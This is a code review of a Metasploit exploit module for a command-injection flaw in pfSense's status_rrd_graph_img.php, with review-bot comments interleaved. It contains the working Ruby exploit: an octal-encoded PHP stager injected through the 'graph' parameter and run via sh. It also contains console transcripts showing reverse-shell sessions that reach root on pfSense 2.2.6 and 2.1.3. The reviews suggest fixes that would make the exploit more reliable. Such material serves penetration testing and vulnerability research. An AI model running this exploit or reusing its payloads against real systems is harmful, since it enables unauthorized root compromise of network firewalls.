requested changes

MS-2855/keylogger-mettle-extension
wetw0rk 2018-01-01 17:30:43 -06:00
parent bc088cb379
commit 8f0e41e159
2 changed files with 35 additions and 100 deletions

@ -27,44 +27,22 @@
### pfSense Community Edition 2.2.6-RELEASE ### pfSense Community Edition 2.2.6-RELEASE
``` ```
msf exploit(unix/http/pfsense_graph_injection_exec) > options msf exploit(unix/http/pfsense_graph_injection_exec) > use exploit/unix/http/pfsense_graph_injection_execmsf exploit(unix/http/pfsense_graph_injection_exec) > set RHOST 2.2.2.2
RHOST => 2.2.2.2
msf exploit(unix/http/pfsense_graph_injection_exec) > set LHOST 1.1.1.1
LHOST => 1.1.1.1
msf exploit(unix/http/pfsense_graph_injection_exec) > exploit
Module options (exploit/unix/http/pfsense_graph_injection_exec): [*] Started reverse TCP handler on 1.1.1.1:4444
Name Current Setting Required Description
---- --------------- -------- -----------
PASSWORD pfsense yes Password to login with
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 192.168.75.132 yes The target address
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
USERNAME admin yes User to login with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.75.128 yes The listen address
LPORT 80 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
msf exploit(unix/http/pfsense_graph_injection_exec) > exploit
[*] Started reverse TCP handler on 192.168.75.128:80
[*] Detected pfSense 2.2.6-RELEASE, uploading intial payload [*] Detected pfSense 2.2.6-RELEASE, uploading intial payload
[*] Triggering the payload, root shell incoming... [*] Payload uploaded successfully, executing
[*] Sending stage (37543 bytes) to 192.168.75.132 [*] Sending stage (37543 bytes) to 2.2.2.2
[*] Meterpreter session 1 opened (192.168.75.128:80 -> 192.168.75.132:34381) at 2018-01-01 02:07:03 -0600 [*] Meterpreter session 1 opened (1.1.1.1:4444 -> 2.2.2.2:42116) at 2018-01-01 17:17:36 -0600
meterpreter > sysinfo
Computer : pfSense.localdomain
OS : FreeBSD pfSense.localdomain 10.1-RELEASE-p25 FreeBSD 10.1-RELEASE-p25 #0 c39b63e(releng/10.1)-dirty: Mon Dec 21 15:20:13 CST 2015 root@pfs22-amd64-builder:/usr/obj.RELENG_2_2.amd64/usr/pfSensesrc/src.RELENG_2_2/sys/pfSense_SMP.10 amd64
Meterpreter : php/freebsd
meterpreter > getuid meterpreter > getuid
Server username: root (0) Server username: root (0)
meterpreter > meterpreter >
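Review bot: the rewritten 2.2.6 session uses `1.1.1.1` and `2.2.2.2` for LHOST and RHOST; both are routable public addresses, so anyone pasting the transcript sends a reverse handler bind and an exploit attempt at real hosts. Use RFC 5737 documentation addresses (e.g. `192.0.2.10` / `198.51.100.10`) or keep the lab addresses the old text had. Dropping the `options` listing also removes the only place the doc showed that RPORT 443, SSL true and the default USERNAME/PASSWORD (`admin`/`pfsense`) are what the run depended on; keep a short `show options` block or say so in a sentence above the session. While here, `uploading intial payload` (unchanged on both sides) is a typo for `initial` that comes from the module's own print_status and should be fixed there as well.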
@ -73,45 +51,20 @@ meterpreter >
### pfSense Community Edition 2.1.3-RELEASE ### pfSense Community Edition 2.1.3-RELEASE
``` ```
msf exploit(unix/http/pfsense_graph_injection_exec) > options msf > use exploit/unix/http/pfsense_graph_injection_exec
msf exploit(unix/http/pfsense_graph_injection_exec) > set RHOST 2.2.2.2
Module options (exploit/unix/http/pfsense_graph_injection_exec): RHOST => 2.2.2.2
msf exploit(unix/http/pfsense_graph_injection_exec) > set LHOST 1.1.1.1
Name Current Setting Required Description LHOST => 1.1.1.1
---- --------------- -------- ----------- msf exploit(unix/http/pfsense_graph_injection_exec) > set PAYLOAD php/reverse_php
PASSWORD pfsense yes Password to login with PAYLOAD => php/reverse_php
Proxies no A proxy chain of format type:host:port[,type:host:port][...]
RHOST 192.168.75.131 yes The target address
RPORT 443 yes The target port (TCP)
SSL true no Negotiate SSL/TLS for outgoing connections
USERNAME admin yes User to login with
VHOST no HTTP server virtual host
Payload options (php/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
LHOST 192.168.75.128 yes The listen address
LPORT 80 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic Target
msf exploit(unix/http/pfsense_graph_injection_exec) > exploit msf exploit(unix/http/pfsense_graph_injection_exec) > exploit
[*] Started reverse TCP handler on 192.168.75.128:80 [*] Started reverse TCP handler on 1.1.1.1:4444
[*] Detected pfSense 2.1.3-RELEASE, uploading intial payload [*] Detected pfSense 2.1.3-RELEASE, uploading intial payload
[*] Triggering the payload, root shell incoming... [*] Payload uploaded successfully, executing
[*] Sending stage (37543 bytes) to 192.168.75.131 [*] Command shell session 1 opened (1.1.1.1:4444 -> 2.2.2.2:3454) at 2018-01-01 15:49:38 -0600
[*] Meterpreter session 1 opened (192.168.75.128:80 -> 192.168.75.131:45257) at 2018-01-01 01:03:05 -0600 uname -a
meterpreter > getuid FreeBSD pfSense.localdomain 8.3-RELEASE-p16 FreeBSD 8.3-RELEASE-p16 #0: Thu May 1 16:19:14 EDT 2014 root@pf2_1_1_amd64.pfsense.org:/usr/obj.amd64/usr/pfSensesrc/src/sys/pfSense_SMP.8 amd64
Server username: root (0)
meterpreter >
``` ```
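Review bot: the 2.1.3 transcript now does `set PAYLOAD php/reverse_php` and ends at `uname -a` in a command shell, so the doc no longer demonstrates root on 2.1.3 (the old text showed `getuid` returning `root (0)`) and gives no reason for abandoning the default meterpreter payload on that version. Add an `id` line to the session and one sentence stating whether `php/meterpreter/reverse_tcp` fails on 2.1.3 (FreeBSD 8.3-RELEASE-p16 per the `uname` output) or was simply not used; otherwise readers will assume the default payload is broken there. The `1.1.1.1`/`2.2.2.2` addresses should be documentation-range addresses for the same reason as in the 2.2.6 block.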

@ -40,7 +40,6 @@ class MetasploitModule < Msf::Exploit::Remote
'Encoder' => 'php/base64', 'Encoder' => 'php/base64',
'PAYLOAD' => 'php/meterpreter/reverse_tcp', 'PAYLOAD' => 'php/meterpreter/reverse_tcp',
}, },
'DisclosureDate' => 'Apr 18, 2016', 'DisclosureDate' => 'Apr 18, 2016',
'Platform' => 'php', 'Platform' => 'php',
'Arch' => ARCH_PHP, 'Arch' => ARCH_PHP,
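Review bot: removing `'PAYLOAD' => 'php/meterpreter/reverse_tcp'` from DefaultOptions hands payload choice to the framework's automatic selection for `'Platform' => 'php'` / `ARCH_PHP`, and the updated 2.2.6 doc in this same commit shows that still yields a php meterpreter session without setting PAYLOAD, so the change is safe; but `'Encoder' => 'php/base64'` stays behind and nothing in the commit says why the default went. State in the PR description that 2.1.3 needs `php/reverse_php` set by hand (the doc does exactly that), or keep the explicit default so `info` continues to advertise the payload the module was tested with.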
@ -108,7 +107,7 @@ class MetasploitModule < Msf::Exploit::Remote
end end
# If the device isn't fully setup, you get stuck at redirects to wizard.php # If the device isn't fully setup, you get stuck at redirects to wizard.php
# however, this does NOT stop exploitation strangely # however, this does NOT stop exploitation strangely
print_error("pfSense version not detected or wizard still enabled.") print_error('pfSense version not detected or wizard still enabled.')
Gem::Version.new('0.0') Gem::Version.new('0.0')
end end
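Review bot: `print_error('pfSense version not detected or wizard still enabled.')` is immediately followed by `return`-style `Gem::Version.new('0.0')`, and the comment above says exploitation continues anyway, so the line reads as a failure while the module keeps going. Use `print_warning` (or `vprint_error`) for that message, or, if the intent is to stop on an undetected version, replace the `0.0` fallback with `fail_with(Failure::NotVulnerable, 'pfSense version not detected')`. The double- to single-quote change is fine and matches the quoting used elsewhere in this commit.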
@ -116,10 +115,10 @@ class MetasploitModule < Msf::Exploit::Remote
begin begin
cookie = login cookie = login
version = detect_version(cookie) version = detect_version(cookie)
filename = rand_text_alpha(rand(20)) filename = rand_text_alpha(rand(10))
# generate the PHP meterpreter payload # generate the PHP meterpreter payload
stager = "echo \'<?php " stager = 'echo \'<?php '
stager << payload.encode stager << payload.encode
stager << "?>\' > #(unknown)" stager << "?>\' > #(unknown)"
# here we begin the encoding process to # here we begin the encoding process to
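Review bot: `rand_text_alpha(rand(10))` can produce an empty filename, because `rand(10)` returns 0..9; roughly one run in ten then builds `echo '<?php ...' > ` with no target and the later `php <filename>` step executes nothing (the old `rand(20)` had the same defect at half the rate). Use a bounded length such as `rand_text_alpha(rand(6..12))` (Kernel#rand accepts a Range) or `rand_text_alpha(6 + rand(6))`. The switch to `'echo \'<?php '` is behaviour-preserving, since the single-quoted literal still yields `echo '<?php `.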
@ -127,25 +126,16 @@ class MetasploitModule < Msf::Exploit::Remote
# don't look # don't look
complete_stage = "" complete_stage = ""
for i in 0..(stager.length()-1) for i in 0..(stager.length()-1)
if "#{version}" =~ /2.2/ if version.to_s =~ /2.2/
complete_stage << "\\\\#{stager[i].ord.to_s(8)}" complete_stage << '\\'
else
complete_stage << "\\#{stager[i].ord.to_s(8)}"
end end
complete_stage << "\\#{stager[i].ord.to_s(8)}"
end end
res = send_request_cgi( res = send_request_cgi(
'uri' => '/status_rrd_graph_img.php', 'uri' => '/status_rrd_graph_img.php',
'method' => 'GET', 'method' => 'GET',
'headers' => { 'cookie' => cookie,
'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
'Accept' => '*/*',
'Accept-Language' => 'en-US,en;q=0.5',
'Accept-Encoding' => 'gzip, deflate',
'Origin' => 'null',
'Cookie' => cookie,
'Connection' => 'close',
},
'vars_get' => { 'vars_get' => {
'database' => '-throughput.rrd', 'database' => '-throughput.rrd',
'graph' => "file|printf '#{complete_stage}'|sh|echo", 'graph' => "file|printf '#{complete_stage}'|sh|echo",
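Review bot: `version.to_s =~ /2.2/` compares a Gem::Version by unanchored regex with an unescaped dot, so it matches any string containing `2?2` and, more importantly, sends every non-2.2 release (2.1.x, 2.3.x, and the `0.0` fallback from detect_version) down the single-backslash path; if the extra backslash is a property of 2.2 and later rather than 2.2 alone, write `version >= Gem::Version.new('2.2')` (detect_version already returns a Gem::Version), and if it really is specific to 2.2 anchor it as `/^2\.2/`. The restructured loop is equivalent to the old branches (`'\\'` is a single backslash, so 2.2 still gets two before each octal escape), but `for i in 0..(stager.length()-1)` with `stager[i].ord` is clearer as `stager.each_byte { |b| ... }`, and `complete_stage = ""` should become `''` to match the quoting changes in this commit. Replacing the copied browser headers with `'cookie' => cookie` is the right call; send_request_cgi builds the Cookie header from that key.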
@ -153,23 +143,15 @@ class MetasploitModule < Msf::Exploit::Remote
) )
if res && res.code == 200 if res && res.code == 200
print_status("Triggering the payload, root shell incoming...") print_status('Payload uploaded successfully, executing')
else else
print_error("Failed to upload the initial payload...") print_error('Failed to upload payload...')
end end
res = send_request_cgi({ res = send_request_cgi({
'uri' => '/status_rrd_graph_img.php', 'uri' => '/status_rrd_graph_img.php',
'method' => 'GET', 'method' => 'GET',
'headers' => { 'cookie' => cookie,
'User-Agent' => 'Mozilla/5.0 (X11; Linux x86_64; rv:52.0) Gecko/20100101 Firefox/52.0',
'Accept' => 'text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8',
'Accept-Language' => 'en-US,en;q=0.5',
'Accept-Encoding' => 'gzip, deflate',
'Cookie' => cookie,
'Connection' => 'close',
'Upgrade-Insecure-Requests' => '1',
},
'vars_get' => { 'vars_get' => {
'database' => '-throughput.rrd', 'database' => '-throughput.rrd',
'graph' => "file|php #(unknown)|echo " 'graph' => "file|php #(unknown)|echo "
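Review bot: the `else` branch prints `Failed to upload payload...` and then falls straight through to the second `send_request_cgi` that runs `php <file>`, so a failed write is reported and immediately followed by an execution attempt against a file that was never created; `return` or `fail_with(Failure::Unknown, 'Failed to upload payload')` there instead. Also, a 200 from `status_rrd_graph_img.php` only shows that the graph request was served (the injected command's output is discarded by `|echo`), so `Payload uploaded successfully, executing` claims more than was verified; `Upload request accepted, executing` or a follow-up check that the file exists would be more accurate.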